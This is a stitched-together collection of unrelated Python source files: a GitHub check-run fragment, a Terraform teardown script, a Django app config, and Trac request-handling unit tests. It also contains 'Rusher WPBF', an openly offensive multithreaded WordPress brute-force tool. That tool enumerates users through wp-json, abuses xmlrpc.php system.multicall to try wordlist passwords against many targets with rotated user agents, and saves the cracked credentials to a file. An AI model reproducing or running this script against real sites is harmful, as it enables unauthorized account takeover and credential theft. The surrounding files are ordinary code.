                    'title': check,
                    'message': info['fix']
                })
        await ghapi.modify_check_run(
            check_run_number,
            status=CheckRunStatus.completed,
            conclusion=conclusion,
            output_title=title,
            output_summary=summary,
            output_text=markdown_report(df),
            output_annotations=annotations)
@celery.task(acks_late=True)
def sleep(seconds, msg):
    """Demo task that just sleeps for a given number of seconds"""
    logger.info("Sleeping for %i seconds: %s", seconds, msg)
    for second in range(seconds):
        time.sleep(1)
        # FIX: range() is 0-based, so the original logged "Slept for 0
        # seconds" after the first second; report elapsed time correctly.
        logger.info("Slept for %i seconds: %s", second + 1, msg)
    logger.info("Waking: %s", msg)
| StarcoderdataPython |
1721553 | #!/usr/bin/env python3
"""
# Copyright (c) 2018, Palo Alto Networks
#
# Permission to use, copy, modify, and/or distribute this software for any
# purpose with or without fee is hereby granted, provided that the above
# copyright notice and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
# Author: <NAME> <EMAIL>
Usage:
git
python destroy.py
"""
import argparse
import logging
from python_terraform import Terraform
logger = logging.getLogger()
handler = logging.StreamHandler()
formatter = logging.Formatter('%(levelname)-8s %(message)s')
handler.setFormatter(formatter)
logger.addHandler(handler)
logger.setLevel(logging.INFO)
def main(username, password):
    """Destroy the WebInDeploy and WebInBootstrap Terraform deployments.

    Args:
        username: Firewall admin username, forwarded as a Terraform variable.
        password: Firewall admin password, forwarded as a Terraform variable.

    Exits the process early if the WebInDeploy destroy fails.
    """
    WebInDeploy_vars = {
        'Admin_Username': username,
        'Admin_Password': password
    }

    WebInBootstrap_vars = {
        'Admin_Username': username,
        'Admin_Password': password
    }

    # Set run_plan to True if you wish to run terraform plan before destroy
    run_plan = False
    kwargs = {"auto-approve": True}

    #
    # Destroy Infrastructure
    #
    tf = Terraform(working_dir='./WebInDeploy')
    # Resource-group names were created by the deploy run; read them back.
    rg_name = tf.output('RG_Name')
    attack_rg_name = tf.output('Attacker_RG_Name')
    logger.info('Got RG_Name {} and Attacker_RG_Name {}'.format(rg_name, attack_rg_name))

    WebInDeploy_vars.update({'RG_Name': rg_name})
    WebInDeploy_vars.update({'Attack_RG_Name': attack_rg_name})

    if run_plan:
        print('Calling tf.plan')
        tf.plan(capture_output=False)

    return_code1, stdout, stderr = tf.cmd('destroy', var=WebInDeploy_vars, capture_output=False, **kwargs)
    print('Got return code {}'.format(return_code1))
    if return_code1 != 0:
        # Non-zero exit from terraform: report the failure and stop.
        logger.error("Failed to destroy WebInDeploy")
        exit()
    logger.info("Destroyed WebInDeploy")

    WebInBootstrap_vars.update({'RG_Name': rg_name})
    WebInBootstrap_vars.update({'Attack_RG_Name': attack_rg_name})

    tf = Terraform(working_dir='./WebInBootstrap')

    if run_plan:
        print('Calling tf.plan')
        tf.plan(capture_output=False)

    return_code1, stdout, stderr = tf.cmd('destroy', var=WebInBootstrap_vars, capture_output=False, **kwargs)
    print('Got return code {}'.format(return_code1))
    if return_code1 != 0:
        # FIX: the original branch was inverted — it logged
        # "WebInBootstrap destroyed" on a NON-zero (failed) return code.
        logger.error("Failed to destroy WebInBootstrap")
    else:
        logger.info("Destroyed WebInBootstrap")
# CLI entry point: collect firewall credentials and tear down the deployment.
if __name__ == '__main__':
    parser = argparse.ArgumentParser(description='Get Terraform Params')
    parser.add_argument('-u', '--username', help='Firewall Username', required=True)
    parser.add_argument('-p', '--password', help='Firewall Password', required=True)
    args = parser.parse_args()
    username = args.username
    password = args.password
    main(username, password)
| StarcoderdataPython |
3287549 | <filename>rest_framework_jet/apps.py
from django.apps import AppConfig
class RestFrameworkJetConfig(AppConfig):
    """Django application configuration for the ``rest_framework_jet`` app."""
    name = 'rest_framework_jet'
| StarcoderdataPython |
138675 | print("""
/$$$$$$$ /$$ /$$ /$$$$$$$ /$$$$$$$ /$$$$$$$$
| $$__ $$ | $$ /$ | $$| $$__ $$| $$__ $$| $$_____/
| $$ \ $$ | $$ /$$$| $$| $$ \ $$| $$ \ $$| $$
| $$$$$$$/ /$$$$$$| $$/$$ $$ $$| $$$$$$$/| $$$$$$$ | $$$$$
| $$__ $$|______/| $$$$_ $$$$| $$____/ | $$__ $$| $$__/
| $$ \ $$ | $$$/ \ $$$| $$ | $$ \ $$| $$
| $$ | $$ | $$/ \ $$| $$ | $$$$$$$/| $$
|__/ |__/ |__/ \__/|__/ |_______/ |__/
=============================================================
[*] [Rusher WPBF - XMLRPC.php] | [R&D ICWR - Afrizal F.A]
=============================================================
""")
import os, sys, random, requests, concurrent.futures
from argparse import ArgumentParser
class rusher_wpbf:
def count_percent(self):
self.percent = self.done_process / self.total_process * 100
def useragent(self):
arr = ["Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.0.12) Gecko/2009070611 Firefox/3.0.12 (.NET CLR 3.5.30729)", "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.464.0 Safari/534.3", "Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_8; ja-jp) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16", "Mozilla/5.0 (X11; U; FreeBSD i386; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.207.0 Safari/532.0", "Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.1 (KHTML, like Gecko) Chrome/6.0.427.0 Safari/534.1"]
return arr[random.randint(0, len(arr)-1)]
def check_xmlrpc(self, target):
try:
xmldata = '<?xml version="1.0"?><methodCall><methodName>system.multicall</methodName><params><param><value><array><data></data></array></value></param></params></methodCall>'
x = requests.post(url="{}/xmlrpc.php".format(target), data=xmldata, headers={ "User-Agent": self.useragent(), "Content-Type": "application/xml" }, timeout=self.args.timeout)
if '<methodResponse>' in x.text:
return True
else:
return False
except:
return False
def get_user(self, target):
try:
x = requests.get(url="{}/wp-json/wp/v2/users/1".format(target), headers={ "User-Agent": self.useragent(), "Content-Type": "application/xml" }, timeout=self.args.timeout)
return x.json()['name']
except:
return "admin"
def req(self, target, user, passwd):
try:
xml = """<?xml version="1.0"?><methodCall><methodName>system.multicall</methodName><params><param><value><array><data><value><struct><member><name>methodName</name><value><string>wp.getUsersBlogs</string></value></member><member><name>params</name><value><array><data><value><array><data><value><string>{}</string></value><value><string>{}</string></value></data></array></value></data></array></value></member></struct></value></data></array></value></param></params></methodCall>""".format(user, passwd)
x = requests.post(url="{}/xmlrpc.php".format(target), headers={ "User-Agent": self.useragent(), "Content-Type": "application/xml" }, data=xml, timeout=self.args.timeout)
if "<name>isAdmin</name>" in x.text:
open("result-wp/success.txt", "a").write("{}|{}|{}\n".format(target, user, passwd))
self.result += 1
self.done_process += 1
self.count_percent()
except:
if self.try_login < 3:
self.try_login += 1
self.req(target, user, passwd)
elif self.try_login > 3:
self.try_login = 0
self.done_process += 1
self.count_percent()
sys.stdout.write("\r[*] [Proccess] [{}/{} | {}%] [Result: {}/{}]".format(self.done_process, self.total_process, round(self.percent), self.result, self.target))
sys.stdout.flush()
def execution(self, target, thread):
if self.check_xmlrpc(target):
user = self.get_user(target)
self.total_process += len(open(self.args.wordlist).read().splitlines())
with concurrent.futures.ThreadPoolExecutor(max_workers=thread) as executor:
for x in open(self.args.wordlist).read().splitlines():
executor.submit(self.req, target, user, x)
else:
pass
def __init__(self):
if not os.path.isdir("result-wp"):
os.mkdir("result-wp")
self.done_process = 0
self.try_login = 0
self.total_process = 0
self.result = 0
parser = ArgumentParser()
parser.add_argument("-x", "--target", required=True)
parser.add_argument("-w", "--wordlist", required=True)
parser.add_argument("-t", "--thread", required=True, type=int)
parser.add_argument("-d", "--timeout", required=True, type=int)
self.args = parser.parse_args()
print("[*] [Thread: {}]".format(self.args.thread))
print("[*] [Timeout: {}]".format(self.args.timeout))
if os.path.isfile(self.args.target):
if os.path.isfile(self.args.wordlist):
print("[*] [Bruteforcing]")
self.target = len(open(self.args.target).read().splitlines())
with concurrent.futures.ThreadPoolExecutor(max_workers=self.args.thread) as executor:
for target in open(self.args.target).read().splitlines():
executor.submit(self.execution, target, self.args.thread)
else:
print("[-] [Error] -> ( Not found {} )".format(self.args.wordlist))
else:
if os.path.isfile(self.args.wordlist):
print("[*] [Bruteforcing]")
self.target = 1
self.execution(self.args.target, self.args.thread)
else:
print("[-] [Error] -> ( Not found {} )".format(self.args.wordlist))
print("\n")
if self.result > 0:
print("[+] [View Result: result-wp/success.txt]")
print("\n")
for x in open("result-wp/success.txt").read().splitlines():
print("[+] [{}]".format(x))
else:
print("[-] [No Result]")
print("\n")
print("[*] [Done]")
if __name__ == "__main__":
rusher_wpbf()
| StarcoderdataPython |
1612929 | # -*- coding: utf-8 -*-
#
# Copyright (C) 2005-2015 Edgewall Software
# All rights reserved.
#
# This software is licensed as described in the file COPYING, which
# you should have received as part of this distribution. The terms
# are also available at http://trac.edgewall.org/wiki/TracLicense.
#
# This software consists of voluntary contributions made by many
# individuals. For the exact contribution history, see the revision
# history and logs, available at http://trac.edgewall.org/log/.
import os.path
import shutil
import sys
import tempfile
import unittest
from StringIO import StringIO
import trac.tests.compat
from genshi.builder import tag
from trac import perm
from trac.core import TracError
from trac.test import EnvironmentStub, Mock, MockPerm, locale_en
from trac.util import create_file
from trac.util.datefmt import utc
from trac.util.text import shorten_line
from trac.web.api import HTTPBadRequest, HTTPInternalError, Request, \
RequestDone, parse_arg_list
from tracopt.perm.authz_policy import AuthzPolicy
class RequestHandlerPermissionsTestCaseBase(unittest.TestCase):
    """Shared fixture for request-handler permission tests.

    Subclasses call ``setUp`` with their handler class; when
    ``authz_policy`` is set, an AuthzPolicy-enabled environment is built
    around a temporary policy file.
    """

    # Subclasses may set this to the body of an authz policy file (string).
    authz_policy = None

    def setUp(self, module_class):
        self.path = tempfile.mkdtemp(prefix='trac-')
        if self.authz_policy is not None:
            # Write the policy file and enable AuthzPolicy ahead of the
            # default permission policy.
            self.authz_file = os.path.join(self.path, 'authz_policy.conf')
            create_file(self.authz_file, self.authz_policy)
            self.env = EnvironmentStub(enable=['trac.*', AuthzPolicy],
                                       path=self.path)
            self.env.config.set('authz_policy', 'authz_file', self.authz_file)
            self.env.config.set('trac', 'permission_policies',
                                'AuthzPolicy, DefaultPermissionPolicy')
        else:
            self.env = EnvironmentStub(path=self.path)
        self.req_handler = module_class(self.env)

    def tearDown(self):
        self.env.reset_db()
        shutil.rmtree(self.path)

    def create_request(self, authname='anonymous', **kwargs):
        """Build a mock request with sane defaults; kwargs override any attribute."""
        kw = {'perm': perm.PermissionCache(self.env, authname), 'args': {},
              'href': self.env.href, 'abs_href': self.env.abs_href,
              'tz': utc, 'locale': None, 'lc_time': locale_en,
              'session': Mock(get=lambda k, d=None: d,
                              set=lambda k, v, d=None: None),
              'authname': authname, 'chrome': {'notices': [], 'warnings': []},
              'method': None, 'get_header': lambda v: None, 'is_xhr': False}
        kw.update(kwargs)
        return Mock(**kw)

    def get_navigation_items(self, req):
        return self.req_handler.get_navigation_items(req)

    def grant_perm(self, username, *actions):
        """Grant each action to username via the PermissionSystem."""
        permsys = perm.PermissionSystem(self.env)
        for action in actions:
            permsys.grant_permission(username, action)

    def process_request(self, req):
        # The handler must claim the request before it may process it.
        self.assertTrue(self.req_handler.match_request(req))
        return self.req_handler.process_request(req)
def _make_environ(scheme='http', server_name='example.org',
                  server_port=80, method='GET', script_name='/trac',
                  **kwargs):
    """Build a minimal WSGI environ dict for tests.

    Keyword arguments beyond the named ones are merged in verbatim and
    may override the base keys.
    """
    base = {
        'wsgi.url_scheme': scheme,
        'wsgi.input': StringIO(''),
        'REQUEST_METHOD': method,
        'SERVER_NAME': server_name,
        'SERVER_PORT': server_port,
        'SCRIPT_NAME': script_name,
    }
    return dict(base, **kwargs)
def _make_req(environ, start_response, args=None, arg_list=(), authname='admin',
              form_token='A' * 40, chrome=None, perm=None, session=None,
              tz=utc, locale=None, **kwargs):
    """Wrap environ in a Request and preset common attributes for tests.

    FIX: the original used mutable default arguments (``args={}``,
    ``chrome={...}``, ``session={}``) and a single ``MockPerm()`` evaluated
    at def time, so state mutated by one test leaked into the next.  The
    defaults are now created fresh per call; passing an explicit value
    still overrides them.
    """
    req = Request(environ, start_response)
    req.args = {} if args is None else args
    req.arg_list = arg_list
    req.authname = authname
    req.form_token = form_token
    req.chrome = {'links': {}, 'scripts': []} if chrome is None else chrome
    req.perm = MockPerm() if perm is None else perm
    req.session = {} if session is None else session
    req.tz = tz
    req.locale = locale
    # Any extra keyword becomes an attribute on the request object.
    for name, value in kwargs.iteritems():
        setattr(req, name, value)
    return req
class RequestTestCase(unittest.TestCase):
    """Unit tests for trac.web.api.Request: base-URL derivation, redirects,
    response writing, cookie parsing and query-string argument handling."""

    def _make_environ(self, *args, **kwargs):
        # Thin wrapper around the module-level helper for readability below.
        return _make_environ(*args, **kwargs)

    def test_is_xhr_true(self):
        environ = self._make_environ(HTTP_X_REQUESTED_WITH='XMLHttpRequest')
        req = Request(environ, None)
        self.assertTrue(req.is_xhr)

    def test_is_xhr_false(self):
        environ = self._make_environ()
        req = Request(environ, None)
        self.assertFalse(req.is_xhr)

    def test_base_url(self):
        environ = self._make_environ()
        req = Request(environ, None)
        self.assertEqual('http://example.org/trac', req.base_url)

    def test_base_url_host(self):
        # An explicit Host header wins over SERVER_NAME/SERVER_PORT.
        environ = self._make_environ(server_port=8080, HTTP_HOST='example.com')
        req = Request(environ, None)
        self.assertEqual('http://example.com/trac', req.base_url)

    def test_base_url_nondefaultport(self):
        environ = self._make_environ(server_port=8080)
        req = Request(environ, None)
        self.assertEqual('http://example.org:8080/trac', req.base_url)

    def test_base_url_https(self):
        environ = self._make_environ(scheme='https', server_port=443)
        req = Request(environ, None)
        self.assertEqual('https://example.org/trac', req.base_url)

    def test_base_url_https_host(self):
        environ = self._make_environ(scheme='https', server_port=443,
                                     HTTP_HOST='example.com')
        req = Request(environ, None)
        self.assertEqual('https://example.com/trac', req.base_url)

    def test_base_url_https_nondefaultport(self):
        environ = self._make_environ(scheme='https', server_port=8443)
        req = Request(environ, None)
        self.assertEqual('https://example.org:8443/trac', req.base_url)

    def test_base_url_proxy(self):
        # X-Forwarded-Host must NOT override the direct Host header.
        environ = self._make_environ(HTTP_HOST='localhost',
                                     HTTP_X_FORWARDED_HOST='example.com')
        req = Request(environ, None)
        self.assertEqual('http://localhost/trac', req.base_url)

    def test_languages(self):
        environ = self._make_environ()
        environ['HTTP_ACCEPT_LANGUAGE'] = 'en-us,en;q=0.5'
        req = Request(environ, None)
        self.assertEqual(['en-us', 'en'], req.languages)

    def test_redirect(self):
        # Relative redirect targets are resolved against the base URL.
        status_sent = []
        headers_sent = {}
        def start_response(status, headers):
            status_sent.append(status)
            headers_sent.update(dict(headers))
        environ = self._make_environ(method='HEAD')
        req = Request(environ, start_response)
        req.session = Mock(save=lambda: None)
        self.assertRaises(RequestDone, req.redirect, '/trac/test')
        self.assertEqual('302 Found', status_sent[0])
        self.assertEqual('http://example.org/trac/test',
                         headers_sent['Location'])

    def test_redirect_absolute(self):
        # Absolute redirect targets are passed through unchanged.
        status_sent = []
        headers_sent = {}
        def start_response(status, headers):
            status_sent.append(status)
            headers_sent.update(dict(headers))
        environ = self._make_environ(method='HEAD')
        req = Request(environ, start_response,)
        req.session = Mock(save=lambda: None)
        self.assertRaises(RequestDone, req.redirect,
                          'http://example.com/trac/test')
        self.assertEqual('302 Found', status_sent[0])
        self.assertEqual('http://example.com/trac/test',
                         headers_sent['Location'])

    def test_redirect_with_post_and_hash_for_msie(self):
        # Older MSIE drops the fragment on a 303 redirect after POST, so
        # Trac rewrites it as "__msie303:<fragment>" for those user agents.
        url = 'http://example.com/trac/ticket/1#comment:2'
        msie303 = 'http://example.com/trac/ticket/1#__msie303:comment:2'
        def location(ua):
            """Perform a POST redirect under user agent *ua* and return the
            Location header that was sent."""
            status_sent = []
            headers_sent = {}
            def start_response(status, headers):
                status_sent.append(status)
                headers_sent.update(dict(headers))
            environ = self._make_environ(method='POST', HTTP_USER_AGENT=ua)
            req = Request(environ, start_response,)
            req.session = Mock(save=lambda: None)
            self.assertRaises(RequestDone, req.redirect, url)
            self.assertEqual('303 See Other', status_sent[0])
            return headers_sent['Location']
        # IE 11 strict mode
        self.assertEqual(url, location(
            'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko'))
        # IE 11 compatibility view mode
        self.assertEqual(url, location(
            'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0)'))
        # IE 10 strict mode
        self.assertEqual(url, location(
            'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)'
            ))
        # IE 10 compatibility view mode
        self.assertEqual(url, location(
            'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0)'))
        # IE 9 strict mode
        self.assertEqual(msie303, location(
            'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)'))
        # IE 9 compatibility view mode
        self.assertEqual(msie303, location(
            'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0)'))
        # IE 8 strict mode
        self.assertEqual(msie303, location(
            'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)'))
        # IE 8 compatibility view mode
        self.assertEqual(msie303, location(
            'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0)'))
        # IE 7
        self.assertEqual(msie303, location(
            'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)'))
        # IE 6
        self.assertEqual(msie303, location(
            'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'))

    def test_write_iterable(self):
        buf = StringIO()
        def write(data):
            buf.write(data)
        def start_response(status, headers):
            return write
        environ = self._make_environ(method='GET')
        # NOTE(review): buf is rebound here; write() resolves the name via the
        # closure at call time, so it writes into this second StringIO.
        buf = StringIO()
        req = Request(environ, start_response)
        req.send_header('Content-Type', 'text/plain;charset=utf-8')
        req.write(('Foo', 'bar', 'baz'))
        self.assertEqual('Foobarbaz', buf.getvalue())

    def test_write_unicode(self):
        buf = StringIO()
        def write(data):
            buf.write(data)
        def start_response(status, headers):
            return write
        environ = self._make_environ(method='HEAD')
        req = Request(environ, start_response)
        req.send_header('Content-Type', 'text/plain;charset=utf-8')
        req.send_header('Content-Length', 0)
        # anyway we're not supposed to send unicode, so we get a ValueError
        self.assertRaises(ValueError, req.write, u'Föö')
        self.assertRaises(ValueError, req.write, ('F', u'öo'))

    def test_send_iterable(self):
        # send() must concatenate chunks (including empty ones) in order.
        baton = {'content': StringIO(), 'status': None, 'headers': None}
        def write(data):
            baton['content'].write(data)
        def start_response(status, headers):
            baton['status'] = status
            baton['headers'] = headers
            return write
        environ = self._make_environ(method='GET')
        def iterable():
            yield 'line1,'
            yield ''
            yield 'line2,'
            yield 'line3\n'
        req = Request(environ, start_response)
        self.assertRaises(RequestDone, req.send, iterable())
        self.assertEqual('200 Ok', baton['status'])
        self.assertEqual([('Cache-Control', 'must-revalidate'),
                          ('Expires', 'Fri, 01 Jan 1999 00:00:00 GMT'),
                          ('Content-Type', 'text/html;charset=utf-8')],
                         baton['headers'])
        self.assertEqual('line1,line2,line3\n', baton['content'].getvalue())

    def test_invalid_cookies(self):
        # Malformed cookie names must be ignored rather than raise.
        environ = self._make_environ(HTTP_COOKIE='bad:key=value;')
        req = Request(environ, None)
        self.assertEqual('', str(req.incookie))

    def test_multiple_cookies(self):
        # When a cookie repeats, the first occurrence wins.
        environ = self._make_environ(HTTP_COOKIE='key=value1; key=value2;')
        req = Request(environ, None)
        self.assertEqual('Set-Cookie: key=value1',
                         str(req.incookie).rstrip(';'))

    def test_read(self):
        environ = self._make_environ(**{'wsgi.input': StringIO('test input')})
        req = Request(environ, None)
        self.assertEqual('test input', req.read())

    def test_read_size(self):
        environ = self._make_environ(**{'wsgi.input': StringIO('test input')})
        req = Request(environ, None)
        self.assertEqual('test', req.read(size=4))

    def test_qs_on_post(self):
        """Make sure req.args parsing is consistent even after the backwards
        incompatible change introduced in Python 2.6.
        """
        environ = self._make_environ(method='GET',
                                     **{'QUERY_STRING': 'action=foo'})
        req = Request(environ, None)
        self.assertEqual('foo', req.args['action'])
        # On POST, the form body must take precedence over the query string.
        environ = self._make_environ(method='POST',
                                     **{'wsgi.input': StringIO('action=bar'),
                                        'CONTENT_LENGTH': '10',
                                        'CONTENT_TYPE': 'application/x-www-form-urlencoded',
                                        'QUERY_STRING': 'action=foo'})
        req = Request(environ, None)
        self.assertEqual('bar', req.args['action'])

    def test_qs_invalid_value_bytes(self):
        # Undecodable percent-escapes in a value produce a 400, not a crash.
        environ = self._make_environ(**{'QUERY_STRING': 'name=%FF'})
        req = Request(environ, None)
        self.assertRaises(HTTPBadRequest, lambda: req.arg_list)

    def test_qs_invalid_name_bytes(self):
        # Undecodable percent-escapes in a name produce a 400, not a crash.
        environ = self._make_environ(**{'QUERY_STRING': '%FF=value'})
        req = Request(environ, None)
        self.assertRaises(HTTPBadRequest, lambda: req.arg_list)
class RequestSendFileTestCase(unittest.TestCase):
    """Tests for Request.send_file, with and without X-Sendfile delegation."""

    def setUp(self):
        self.status = None
        self.headers = None
        self.response = StringIO()
        # A throwaway file with known contents to serve in each test.
        self.dir = tempfile.mkdtemp(prefix='trac-')
        self.filename = os.path.join(self.dir, 'test.txt')
        self.data = 'contents\n'
        create_file(self.filename, self.data, 'wb')
        self.req = None

    def tearDown(self):
        # Close any file wrapper still held by the request before removing
        # the temporary directory.
        if self.req and self.req._response:
            self.req._response.close()
        shutil.rmtree(self.dir)

    def _start_response(self, status, headers):
        """WSGI start_response stub capturing status/headers on the test case."""
        self.status = status
        self.headers = dict(headers)
        def write(data):
            self.response.write(data)
        return write

    def _create_req(self, use_xsendfile=False, xsendfile_header='X-Sendfile',
                    **kwargs):
        """Build a Request whose xsendfile callbacks return the given values."""
        req = Request(_make_environ(**kwargs), self._start_response)
        req.callbacks.update({'use_xsendfile': lambda r: use_xsendfile,
                              'xsendfile_header': lambda r: xsendfile_header})
        self.req = req
        return req

    def test_send_file(self):
        # Default path: content streamed by Trac, no X-Sendfile header.
        req = self._create_req()
        self.assertRaises(RequestDone, req.send_file, self.filename,
                          'text/plain')
        self.assertEqual('200 Ok', self.status)
        self.assertEqual('text/plain', self.headers['Content-Type'])
        self.assertEqual(str(len(self.data)), self.headers['Content-Length'])
        self.assertNotIn('X-Sendfile', self.headers)
        self.assertEqual(self.data, ''.join(req._response))
        self.assertEqual('', self.response.getvalue())

    def test_send_file_with_xsendfile(self):
        # X-Sendfile enabled: only the header is sent, no body is produced.
        req = self._create_req(use_xsendfile=True)
        self.assertRaises(RequestDone, req.send_file, self.filename,
                          'text/plain')
        self.assertEqual('200 Ok', self.status)
        self.assertEqual('text/plain', self.headers['Content-Type'])
        self.assertEqual(self.filename, self.headers['X-Sendfile'])
        self.assertEqual(None, req._response)
        self.assertEqual('', self.response.getvalue())

    def test_send_file_with_xsendfile_header(self):
        # A custom header name (nginx-style X-Accel-Redirect) is honored.
        req = self._create_req(use_xsendfile=True,
                               xsendfile_header='X-Accel-Redirect')
        self.assertRaises(RequestDone, req.send_file, self.filename,
                          'text/plain')
        self.assertEqual('200 Ok', self.status)
        self.assertEqual('text/plain', self.headers['Content-Type'])
        self.assertEqual(self.filename, self.headers['X-Accel-Redirect'])
        self.assertNotIn('X-Sendfile', self.headers)
        self.assertEqual(None, req._response)
        self.assertEqual('', self.response.getvalue())

    def test_send_file_with_xsendfile_and_empty_header(self):
        # An empty header name disables X-Sendfile and falls back to streaming.
        req = self._create_req(use_xsendfile=True, xsendfile_header='')
        self.assertRaises(RequestDone, req.send_file, self.filename,
                          'text/plain')
        self.assertEqual('200 Ok', self.status)
        self.assertEqual('text/plain', self.headers['Content-Type'])
        self.assertEqual(str(len(self.data)), self.headers['Content-Length'])
        self.assertNotIn('X-Sendfile', self.headers)
        self.assertEqual(self.data, ''.join(req._response))
        self.assertEqual('', self.response.getvalue())
class SendErrorTestCase(unittest.TestCase):
    """Tests for the error page rendered by ``Request.send_error``.

    Covers the difference between a ``TracError`` page and a genuine
    internal-error page, for admin and non-admin users, with and without
    a configured admin Trac URL.
    """

    def setUp(self):
        self.env = EnvironmentStub()

    def tearDown(self):
        self.env.reset_db()

    def test_trac_error(self):
        content = self._send_error(error_klass=TracError)
        self.assertIn('<p class="message">Oops!</p>', content)
        self.assertNotIn('<strong>Trac detected an internal error:</strong>',
                         content)
        self.assertNotIn('There was an internal error in Trac.', content)

    def test_internal_error_for_non_admin(self):
        content = self._send_error(perm={})
        self.assertIn('There was an internal error in Trac.', content)
        self.assertIn('<p>To that end, you could', content)
        self.assertNotIn('This is probably a local installation issue.',
                         content)
        self.assertNotIn('<h2>Found a bug in Trac?</h2>', content)

    def test_internal_error_with_admin_trac_for_non_admin(self):
        content = self._send_error(perm={},
                                   admin_trac_url='http://example.org/admin')
        self.assertIn('There was an internal error in Trac.', content)
        self.assertIn('<p>To that end, you could', content)
        self.assertIn(' action="http://example.org/admin/newticket#"', content)
        self.assertNotIn('This is probably a local installation issue.',
                         content)
        self.assertNotIn('<h2>Found a bug in Trac?</h2>', content)

    def test_internal_error_without_admin_trac_for_non_admin(self):
        content = self._send_error(perm={}, admin_trac_url='')
        self.assertIn('There was an internal error in Trac.', content)
        self.assertNotIn('<p>To that end, you could', content)
        self.assertNotIn('This is probably a local installation issue.',
                         content)
        self.assertNotIn('<h2>Found a bug in Trac?</h2>', content)

    def test_internal_error_for_admin(self):
        content = self._send_error()
        self.assertNotIn('There was an internal error in Trac.', content)
        self.assertIn('This is probably a local installation issue.', content)
        self.assertNotIn('a ticket at the admin Trac to report', content)
        self.assertIn('<h2>Found a bug in Trac?</h2>', content)
        self.assertIn('<p>Otherwise, please', content)
        self.assertIn(' action="http://example.org/tracker/newticket"',
                      content)

    def test_internal_error_with_admin_trac_for_admin(self):
        content = self._send_error(admin_trac_url='http://example.org/admin')
        self.assertNotIn('There was an internal error in Trac.', content)
        self.assertIn('This is probably a local installation issue.', content)
        self.assertIn('a ticket at the admin Trac to report', content)
        self.assertIn(' action="http://example.org/admin/newticket#"', content)
        self.assertIn('<h2>Found a bug in Trac?</h2>', content)
        self.assertIn('<p>Otherwise, please', content)
        self.assertIn(' action="http://example.org/tracker/newticket"',
                      content)

    def test_internal_error_without_admin_trac_for_admin(self):
        content = self._send_error(admin_trac_url='')
        self.assertNotIn('There was an internal error in Trac.', content)
        self.assertIn('This is probably a local installation issue.', content)
        self.assertNotIn('a ticket at the admin Trac to report', content)
        self.assertIn('<h2>Found a bug in Trac?</h2>', content)
        self.assertIn('<p>Otherwise, please', content)
        self.assertIn(' action="http://example.org/tracker/newticket"',
                      content)

    def _send_error(self, admin_trac_url='.', perm=None,
                    error_klass=ValueError):
        """Invoke ``Request.send_error`` and return the rendered page body.

        The error is raised and caught locally so a real traceback is
        available in ``sys.exc_info()``, then fed to ``send_error``
        together with a minimal template data dict.
        """
        self.env.config.set('project', 'admin_trac_url', admin_trac_url)
        # assertEqual: assertEquals is a deprecated alias of assertEqual.
        self.assertEqual(admin_trac_url, self.env.project_admin_trac_url)
        content = StringIO()
        result = {'status': None, 'headers': []}

        def write(data):
            content.write(data)

        def start_response(status, headers, exc_info=None):
            result['status'] = status
            result['headers'].extend(headers)
            return write

        environ = _make_environ()
        req = _make_req(environ, start_response)
        try:
            raise error_klass('Oops!')
        except error_klass:  # narrow: only the error raised just above
            exc_info = sys.exc_info()
        data = {'title': 'Internal Error',
                'type': 'TracError' if error_klass is TracError else 'internal',
                'message': 'Oops!', 'traceback': None, 'frames': [],
                'shorten_line': shorten_line,
                'plugins': [], 'faulty_plugins': [],
                'tracker': 'http://example.org/tracker', 'tracker_args': {},
                'description': '', 'description_en': '',
                'get_systeminfo': lambda: ()}
        if perm is not None:
            data['perm'] = perm
        self.assertRaises(RequestDone, req.send_error, exc_info, env=self.env,
                          data=data)
        content = content.getvalue().decode('utf-8')
        self.assertIn('<!DOCTYPE ', content)
        self.assertEqual('500', result['status'].split()[0])
        self.assertIn(('Content-Type', 'text/html;charset=utf-8'),
                      result['headers'])
        return content
class ParseArgListTestCase(unittest.TestCase):
    """Tests for `parse_arg_list` decoding of percent-encoded query strings."""

    def test_qs_str(self):
        args = parse_arg_list('k%C3%A9y=resum%C3%A9&r%C3%A9sum%C3%A9')
        # assertIsInstance replaces the original assertTrue(unicode, ...)
        # calls: assertTrue treats its second argument as the failure
        # *message*, so those assertions always passed and checked nothing.
        self.assertIsInstance(args[0][0], unicode)
        self.assertIsInstance(args[0][1], unicode)
        self.assertEqual(u'kéy', args[0][0])
        self.assertEqual(u'resumé', args[0][1])
        self.assertIsInstance(args[1][0], unicode)
        self.assertEqual(u'résumé', args[1][0])

    def test_qs_str_with_prefix(self):
        """The leading `?` should be stripped from the query string."""
        args = parse_arg_list('?k%C3%A9y=resum%C3%A9&r%C3%A9sum%C3%A9')
        self.assertIsInstance(args[0][0], unicode)
        self.assertIsInstance(args[0][1], unicode)
        self.assertEqual(u'kéy', args[0][0])
